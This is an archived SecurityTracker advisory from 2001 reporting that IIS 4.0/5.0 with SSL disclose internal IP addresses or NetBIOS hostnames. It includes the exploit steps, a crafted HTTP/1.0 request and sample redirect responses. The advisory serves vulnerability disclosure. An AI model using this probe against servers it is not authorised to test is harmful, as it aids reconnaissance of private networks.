SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   Microsoft Internet Information Server (IIS) Web Server Vendors:   Microsoft
Microsoft Internet Information Server (IIS) Web Server Discloses Internal IP Addresses or NetBIOS Host Names to Remote Users
SecurityTracker Alert ID:  1002161
SecurityTracker URL:  http://securitytracker.com/id/1002161
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 8 2001
Impact:   Disclosure of system information
Exploit Included:  Yes  
Version(s): 4.0 with SSL, 5.0 with SSL
Description:   A vulnerability was reported by e-Synergies in Microsoft's IIS web server that allows remote users to determine internal IP addresses used by the web server or internal NetBIOS host names used by the web server.

A remote user can connect to the web server using SSL (on TCP port 443) and retrieve internal IP addresses or determine the host's network node hostname.

The following steps can be followed to trigger the vulnerability:

1- Browse the web site using a normal SSL browser and find any directory (i.e., https://[targethost]/images/icon.gif).

2- Using a compatible SSL Perl script, execute the following command once connected to port 443 of [targethost]:

GET /images HTTP/1.0

3- The result returned by the secure web server should look like this:

HTTP/1.1 302 Object Moved
Location: https://192.168.1.10/images/
Server: Microsoft-IIS/4.0
Content-Type: text/html
Content-Length: xxx

or

HTTP/1.1 302 Object Moved
Location: https://netbiosname/images/
Server: Microsoft-IIS/4.0
Content-Type: text/html
Content-Length: xxx

It is reported that using HTTP/1.1 in the request instead of HTTP/1.0 will not give the same results.

Impact:   A remote user can determine internal IP addresses used by the web server or internal NetBIOS host names used by the web server.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/technet/security/ (Links to External Site)
Cause:   State error
Underlying OS:  Windows (NT), Windows (2000)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(HTTP is Also Affected) Re: Microsoft Internet Information Server (IIS) Web Server Discloses Internal IP Addresses or NetBIOS Host Names to Remote Users
This is a follow-up message.
(Knowledge Base Article Covers This Issue) Re: Microsoft Internet Information Server (IIS) Web Server Discloses Internal IP Addresses or NetBIOS Host Names to Remote Users
There is a Knowledge Base article that covers this issue.



 Source Message Contents

Subject:  Internal IP Address Disclosure in Microsoft-IIS 4.0 & 5.0


GGS-AU / e-Synergies Security Advisory
August 8, 2001

Internal IP Address Disclosure in Microsoft-IIS 4.0 & 
5.0

Synopsis:

e-Synergies has discovered and researched remote 
vulnerability in Internet Information Server from 
Microsoft.  Successful
exploitation of this vulnerability can reveal critical 
internal information such as Internal IP Address or 
Internal host name.

Affected Versions:

Microsoft IIS 4.0 running SSL
Microsoft IIS 5.0 running SSL

Description:

By connecting manually to port TCP/443 (SSL) using 
Perl(SSLeay) or any other tools, a remote user has 
the ability to retrieve
Internal IP address or reveal the machine's network 
node hostname.

Exploit:

1-      Browse the web site using a normal SSL 
browser and find any directory. I.E.: 
https://www.target.com/images/icon.gif

2-      Using a compatible SSL Perl script, execute the 
following command once connected to port 443 of 
www.target.com:

        GET /images HTTP/1.0

3-      The result should look like this:

        HTTP/1.1 302 Object Moved
        Location: https://192.168.1.10/images/
        Server: Microsoft-IIS/4.0
        Content-Type: text/html
        Content-Length: xxx

        or

        HTTP/1.1 302 Object Moved
        Location: https://netbiosname/images/
        Server: Microsoft-IIS/4.0
        Content-Type: text/html
        Content-Length: xxx

Remarks:

Using HTTP/1.1 instead of HTTP/1.0 will not give the 
same result.

Credits:

Marek Roy
Senior IT Security Consultant

Please send suggestions, updates, and comments to:

GGS-AU / e-synergies, Sydney, Australia 

Level 9
65 York Street
Sydney NSW 2001
Australia

Phone: +61 2 9279 2533
Fax: +61 2 9279 2544
Email: enquiries@ggs-au.com
http://www.ggs-au.com

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC